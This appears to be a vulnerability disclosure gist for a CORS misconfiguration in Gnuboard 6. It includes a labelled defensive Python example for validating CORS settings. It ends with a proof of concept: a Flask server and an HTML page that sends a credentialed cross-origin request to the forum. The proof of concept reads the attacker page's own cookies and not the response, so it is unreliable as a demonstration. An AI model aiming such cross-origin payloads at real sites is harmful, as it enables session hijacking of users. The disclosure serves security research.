@AkiaCode
Last active August 19, 2024 05:03
Gnuboard 6 CORS Misconfiguration Vulnerability Report

[Name of affected Product]

  • gnuboard 6

[Affected version]

  • b9b6bb7, 6.0.7

[Vulnerability Type]

  • CORS Misconfiguration (CWE-942)

[Root Cause]

  • In the Gnuboard 6 CORS settings, allow_origins should not allow all origins when allow_credentials is set to True. When it is set to allow all, session hijacking becomes possible.
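
The rule above expressed as a configuration check plus a strict allowlist policy, in an added example that is not part of the original report and is not Gnuboard 6 code. The setting names allow_origins and allow_credentials come from the report; the function names and the sample origins are hypothetical.

```python
# Added example: stdlib-only model of a safe CORS origin policy.
# Not Gnuboard 6 code; function names and sample origins are hypothetical.

def validate_cors_settings(allow_origins, allow_credentials):
    """Return a list of problems with a CORS configuration (empty list = OK)."""
    problems = []
    if allow_credentials and "*" in allow_origins:
        problems.append("allow_credentials=True combined with allow_origins='*'")
    for origin in allow_origins:
        if origin != "*" and not origin.startswith(("https://", "http://")):
            problems.append(f"origin {origin!r} is not scheme://host[:port]")
    return problems


def cors_response_headers(allow_origins, allow_credentials, request_origin):
    """Headers a strict allowlist policy emits for one request Origin."""
    if validate_cors_settings(allow_origins, allow_credentials):
        raise ValueError("refusing to serve with an unsafe CORS configuration")
    if request_origin is None:          # not a cross-origin browser request
        return {}
    if "*" in allow_origins:            # only reachable with credentials off
        return {"Access-Control-Allow-Origin": "*"}
    if request_origin not in allow_origins:   # exact match, no substring/regex
        return {}
    headers = {"Access-Control-Allow-Origin": request_origin, "Vary": "Origin"}
    if allow_credentials:
        headers["Access-Control-Allow-Credentials"] = "true"
    return headers


def grants_credentialed_access(probe_origin, headers):
    """Audit check: did a response approve credentialed reads for probe_origin?

    `headers` is a dict with canonical header names, taken from a response to a
    request that carried `Origin: probe_origin` for an origin you do not trust.
    """
    acao = headers.get("Access-Control-Allow-Origin")
    acac = headers.get("Access-Control-Allow-Credentials", "").lower()
    return acac == "true" and acao == probe_origin


if __name__ == "__main__":
    trusted = ["https://forum.example"]            # constructed sample allowlist
    print(validate_cors_settings(["*"], True))     # the configuration in the report
    print(cors_response_headers(trusted, True, "https://forum.example"))
    print(cors_response_headers(trusted, True, "https://untrusted.example"))
```
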

[Attack Vectors]

Attached video: video.mp4
Clicking on malicious links in the forum could result in the user's session being hijacked due to a CORS misconfiguration.

[PoC]

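```python
from flask import Flask, send_from_directory

app = Flask(__name__)

# Serve index.html (the page shown after this script) from the application directory.
@app.route('/')
def serve_html():
    return send_from_directory('', 'index.html')

if __name__ == '__main__':
    # Listen on all interfaces, port 8800.
    app.run(host='0.0.0.0', port=8800)
```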
```html
<html>
<body>
    <div id="demo">
        <button type="button" onclick="cors()">Exploit</button>
    </div>
    <script>
        function cors() {
            var xhr = new XMLHttpRequest();
            xhr.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
                    var cookies = document.cookie;
                    document.getElementById("demo").innerText = "Cookies: " + cookies;
                    alert("Cookies: " + cookies);

                }
            };
            xhr.open("GET", "<gunboardUrl>", true);
            xhr.withCredentials = true;
            xhr.send();
        }
    </script>
</body>
</html>
```